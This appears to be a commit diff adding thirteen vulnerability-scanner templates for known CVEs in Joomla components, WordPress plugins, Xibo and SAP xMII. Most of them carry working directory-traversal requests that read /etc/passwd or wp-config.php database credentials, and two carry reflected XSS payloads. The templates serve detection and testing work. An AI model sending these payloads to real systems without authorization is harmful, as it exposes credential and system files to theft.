Adding new template

CVE-2008-4764.yaml

@@ -0,0 +1,27 @@
+id: CVE-2008-4764
+
+info:
+  name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
+  reference: |
+    - https://www.exploit-db.com/exploits/5435
+    - https://www.cvedetails.com/cve/CVE-2008-4764
+  tags: cve,cve2008,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-0944.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-0944
+
+info:
+  name: Joomla! Component com_jcollection - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/11088
+    - https://www.cvedetails.com/cve/CVE-2010-0944
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-1979.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1979
+
+info:
+  name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/12088
+    - https://www.cvedetails.com/cve/CVE-2010-1979
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-1983.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-1983
+
+info:
+  name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
+  reference: |
+    - https://www.exploit-db.com/exploits/12055
+    - https://www.cvedetails.com/cve/CVE-2010-1983
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-2259.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-2259
+
+info:
+  name: Joomla! Component com_bfsurvey - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/10946
+    - https://www.cvedetails.com/cve/CVE-2010-2259
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-2682.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-2682
+
+info:
+  name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/14017
+    - https://www.cvedetails.com/cve/CVE-2010-2682
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2011-4804.yaml

@@ -0,0 +1,27 @@
+id: CVE-2011-4804
+
+info:
+  name: Joomla! Component com_kp - 'Controller' Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/36598
+    - https://www.cvedetails.com/cve/CVE-2011-4804
+  tags: cve,cve2011,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2013-5979.yaml

@@ -0,0 +1,28 @@
+id: CVE-2013-5979
+
+info:
+  name: Xibo 1.2.2/1.4.1 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/26955
+    - https://www.cvedetails.com/cve/CVE-2013-5979
+    - https://bugs.launchpad.net/xibo/+bug/1093967
+  tags: cve,cve2013,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2014-4940.yaml

@@ -0,0 +1,25 @@
+id: CVE-2014-4940
+
+info:
+  name: WordPress Plugin Tera Charts - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
+  reference: https://www.cvedetails.com/cve/CVE-2014-4940
+  tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2014-5368.yaml

@@ -0,0 +1,29 @@
+id: CVE-2014-5368
+
+info:
+  name: WordPress Plugin WP Content Source Control - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
+  reference: |
+    - https://www.exploit-db.com/exploits/39287
+    - https://www.cvedetails.com/cve/CVE-2014-5368
+  tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000139.yaml

@@ -0,0 +1,33 @@
+id: CVE-2016-1000139
+
+info:
+  name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
+  tags: cve,cve2016,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert(document.domain);</script><"'
+          - 'input type="text" name="ContactId"'
+        condition: and
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000146.yaml

@@ -0,0 +1,29 @@
+id: CVE-2016-1000146
+
+info:
+  name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-2389.yaml

@@ -0,0 +1,27 @@
+id: CVE-2016-2389
+
+info:
+  name: SAP xMII 15.0 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
+  reference: |
+    - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
+    - https://www.cvedetails.com/cve/CVE-2016-2389
+  tags: cve,cve2016,lfi,sap
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200